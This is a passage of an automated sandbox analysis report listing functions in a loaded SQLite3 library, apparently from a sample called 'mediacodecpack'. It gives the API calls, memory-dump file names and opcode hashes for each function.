                                                                                        • Opcode ID: a6abbae8c6e8f2e89577a489a37bdbe998ef9662ada317e1813a59820f6ee2b0
                                                                                        • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                                                        • Opcode Fuzzy Hash: a6abbae8c6e8f2e89577a489a37bdbe998ef9662ada317e1813a59820f6ee2b0
                                                                                        • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
                                                                                        APIs
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                                                        • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                                                        • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                                                        • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                                                          • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                          • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                          • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                          • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                          • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                                                        • String ID:
                                                                                        • API String ID: 1903298374-0
                                                                                        • Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                        • Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
                                                                                        • Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                        • Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
                                                                                        APIs
                                                                                          • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                        • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                        • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                        • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                        • String ID:
                                                                                        • API String ID: 1894464702-0
                                                                                        • Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                        • Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
                                                                                        • Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                        • Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
                                                                                        APIs
                                                                                          • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                                                        • sqlite3_log.SQLITE3 ref: 609253E2
                                                                                        • sqlite3_log.SQLITE3 ref: 60925406
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                        • String ID:
                                                                                        • API String ID: 3336957480-0
                                                                                        • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                        • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
                                                                                        • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                        • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                                                        APIs
                                                                                        • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                                        • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                                        • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                                        • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                                        • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                                        • String ID:
                                                                                        • API String ID: 3091402450-0
                                                                                        • Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                        • Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
                                                                                        • Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                        • Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                        • String ID:
                                                                                        • API String ID: 251237202-0
                                                                                        • Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                        • Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
                                                                                        • Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                        • Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
                                                                                        APIs
                                                                                        • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                                        • String ID:
                                                                                        • API String ID: 4225432645-0
                                                                                        • Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                        • Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
                                                                                        • Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                        • Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
                                                                                        APIs
                                                                                        • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 6090359D
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 609035E0
                                                                                        • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 609035F9
                                                                                        • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 60903614
                                                                                        • sqlite3_free.SQLITE3(?,-00000200,?), ref: 6090361C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                        • String ID:
                                                                                        • API String ID: 251237202-0
                                                                                        • Opcode ID: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                                                        • Instruction ID: 98a7ce7f1ce2ff6a0e5ca4ca87ec4bf20a5c319c62b2fc6798152503390b0136
                                                                                        • Opcode Fuzzy Hash: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                                                        • Instruction Fuzzy Hash: B211FE725186218BCB00EF7DC8C16197FE7FB66358F01491DE866D7362D73AD480AB42
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: ($string or blob too big$|
                                                                                        • API String ID: 632333372-2398534278
                                                                                        • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                        • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                                                        • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                        • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                                                        APIs
                                                                                        • sqlite3_stricmp.SQLITE3(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6094E8D4), ref: 60923675
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_stricmp
                                                                                        • String ID: BINARY
                                                                                        • API String ID: 912767213-907554435
                                                                                        • Opcode ID: 3d1fa6dfa686e47e8cf6a82fec0319180f7cc9a55e66fae3459e63466e3d3e47
                                                                                        • Instruction ID: 142a1e9d4f1e8552d2c1f4074703eb5ae9f1e70d76b7ded3e689f9c37387bea1
                                                                                        • Opcode Fuzzy Hash: 3d1fa6dfa686e47e8cf6a82fec0319180f7cc9a55e66fae3459e63466e3d3e47
                                                                                        • Instruction Fuzzy Hash: 11512AB8A142159FCF05CF68D580A9EBBFBBFA9314F208569D855AB318D335EC41CB90
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$Protect$Query
                                                                                        • String ID: @
                                                                                        • API String ID: 3618607426-2766056989
                                                                                        • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                        • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                                                        • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                        • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                                                        APIs
                                                                                        • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                                          • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                        • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                                        • sqlite3_free.SQLITE3 ref: 609283B6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                        • String ID: d
                                                                                        • API String ID: 211589378-2564639436
                                                                                        • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                        • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                                                        • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                        • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                                        • API String ID: 1646373207-2713375476
                                                                                        • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                        • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                                        • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                        • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free
                                                                                        • String ID:
                                                                                        • API String ID: 2313487548-0
                                                                                        • Opcode ID: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                                        • Instruction ID: 4e09bb13dd5a3c3c1d339de95b14bc5918580ae4e3dbdcf066e72e084d482625
                                                                                        • Opcode Fuzzy Hash: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                                        • Instruction Fuzzy Hash: 15E14674928209EFDB04CF94D184B9EBBB2FF69304F208558D8956B259D774EC86CF81
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: sqlite_master$sqlite_sequence$sqlite_temp_master
                                                                                        • API String ID: 0-1177837799
                                                                                        • Opcode ID: 220fba3a2fb3ab4d5034cb0a2e8c7e996f73753fd556fb076663e5e6b14f60a3
                                                                                        • Instruction ID: e5240d50caebec33bd4ce83d4b9fb982fe545a794019e3d400788b6e3ec19482
                                                                                        • Opcode Fuzzy Hash: 220fba3a2fb3ab4d5034cb0a2e8c7e996f73753fd556fb076663e5e6b14f60a3
                                                                                        • Instruction Fuzzy Hash: F7C13974B062089BDB05DF68D49179EBBF3AFA8308F14C42DE8899B345DB39D841CB41
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                                        • String ID:
                                                                                        • API String ID: 1648232842-0
                                                                                        • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                        • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                                                        • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                        • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                                                        APIs
                                                                                        • sqlite3_step.SQLITE3 ref: 609614AB
                                                                                        • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
